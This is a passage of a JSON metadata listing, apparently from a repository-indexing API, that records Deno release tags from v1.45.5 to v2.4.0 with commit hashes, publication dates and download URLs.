1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-3